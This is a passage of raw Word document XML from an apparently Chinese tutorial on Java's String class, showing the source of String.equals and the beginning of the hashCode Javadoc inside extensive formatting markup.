          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * @see  #compareTo(String)</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * @see  #equalsIgnoreCase(String)</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    */</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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public</w:t>
      </w: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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> equals(Object anObject) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w: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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> == anObject) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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return</w:t>
      </w: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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (anObject </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> String) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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String anotherString = (String)anObject;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> n = count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (n == anotherString.count) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> v1[] = value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> v2[] = anotherString.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> i = offset;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> j = anotherString.offset;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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while</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (n-- != </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (v1[i++] != v2[j++])  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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return</w:t>
      </w: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false</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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return</w:t>
      </w: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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>return</w:t>
      </w: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false</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:noProof/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="234" name="图片 8" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * Returns a hash code for this string. The hash code for a</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * &lt;code&gt;String&lt;/code&gt; object is computed as</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * &lt;blockquote&gt;&lt;pre&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    * s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * &lt;/pre&gt;&lt;/blockquote&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
